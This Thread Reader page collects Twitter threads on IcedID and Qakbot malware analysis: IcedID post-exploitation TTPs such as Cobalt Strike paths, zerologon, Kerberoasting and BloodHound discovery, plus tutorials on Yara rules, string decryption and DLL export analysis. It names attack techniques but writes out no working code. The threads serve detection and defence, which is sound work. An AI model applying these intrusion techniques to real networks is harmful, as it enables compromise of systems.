Discover and read the best of Twitter Threads about #IcedID

Most recents (4)

1/x
For the past couple of weeks, #IcedID has been hitting hard, with post-exploitation activities beginning within ~1 hour from the initial infection.

Here are some TTPs and IOCs from these post-exploitation activities that will keep defenders ready.
🧵👇
2/x
🎯TTPs
➡️IcedID use of VNC
💡Over port 8080
➡️Multiple Cobalt Strike DLLs on disk
💡Overused directories - "C:\Windows\Tasks" & - "%user%\AppData\Local\Temp"
➡️Heavy use of PowerShell
💡Downloading payloads, exec PowerShell Cobalt Strike Loaders & other processes
3/x
➡️Used multiple privilege escalation methods
💡zerologon, Invoke-Kerberoast, Invoke-EnvBypass
➡️Reverse proxy via Cobalt Strike and then RDPing into the network
➡️Invoke-BloodHound & Invoke-ShareFinder for network and open-shares discovery
Read 8 tweets
🐲 Ghidra Tips 🐲- Malware Encryption and Hashing functions often produce byte sequences that are great for #Yara rules.

Using #Ghidra and a Text Editor - You can quickly develop Yara rules to detect common malware families.
(Demonstrated with #Qakbot)

[1/20]
#Malware #RE
[2/20]
Hashing and encryption functions make good targets for #detection as they are reasonably unique to each malware family and often contain lengthy and specific byte sequences due to the mathematical operations involved.

These characteristics make for good Yara rules 😁
[3/20] The biggest challenge is locating the functions responsible for hashing and encryption. I'll leave that for another thread, but for now...

You can typically recognize hashing/encryption through the use of bitwise operators inside a loop. (xor ^ and shift >> etc).
Read 22 tweets
#Qakbot Dumpulator Script has now been added to Github! 😀

This script is capable of dumping decrypted strings from the encrypted string table used by recent Qakbot malware.

1/ (notes and details below)
#malware #qakbot #dumpulator #RE ImageImageImageImage
2/ The script *should* work on the samples that I have provided in the readme, however you may need to change some register values to get it to work on different samples.

In particular, "dp.regs.ecx" and "dp.regs.esp+0x4" may need to be changed. As these ... Image
3/ cont'd... as these values point to the encrypted string table and key, which will differ between samples. You can re-use the same dump file if you wish, as the code will likely remain the same.
Read 11 tweets
A quick demo of how to identify "real" exported functions from a #obfuscated #IcedID dll file.

I'll also briefly touch on some #Ghidra tips, and how to extract #shellcode using a debugger.

A moderate sized thread😃
[1/13]
[2/13] You can find the relevant files here. Special thanks to @malware_traffic.

First, download the .zip in the screenshot.👇

Then unzip and locate the "rarest.db" file in the "scabs" folder.

(Make sure to do this inside an isolated Virtual Machine)
malware-traffic-analysis.net/2022/09/23/ind…
[3/14] Drag the "rarest.db" file into Pe-Studio and navigate to the exports tab.

There are 11 exported functions here. 🧐

Most of them have junk names to throw off analysis.

One of them is "real", the rest are "decoys" which don't do anything if executed.
Read 14 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!